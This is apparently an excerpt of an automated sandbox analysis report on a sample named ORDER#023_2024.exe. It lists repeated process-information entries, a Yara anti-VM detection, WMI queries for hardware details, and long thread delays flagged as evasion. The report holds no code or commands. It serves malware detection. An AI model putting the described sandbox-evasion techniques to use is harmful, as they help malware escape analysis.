                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: ORDER#023_2024.exe PID: 6936, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 7A70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 8A70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 14C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6784Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1924Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWindow / User API: threadDelayed 2608Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWindow / User API: threadDelayed 7151Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 7004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 5480Thread sleep count: 2608 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep count: 39 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 5480Thread sleep count: 7151 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep count: 33 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99641s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99527s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -99094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -98969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -98836s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -98469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -98337s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -98219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -98110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97235s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -97110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -96094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95235s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -95110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94235s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -94110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -93985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -93860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -93735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -93610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852Thread sleep time: -93485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99766Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99641Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99527Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99422Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99312Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99203Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 99094Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 98969Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 98836Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 98469Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 98337Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 98219Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 98110Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97985Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97860Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97735Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97610Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97485Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97360Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97235Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 97110Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96985Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96860Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96735Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96610Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96485Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96360Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96219Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 96094Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95985Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95860Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95735Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95610Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95485Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95360Jump to behavior
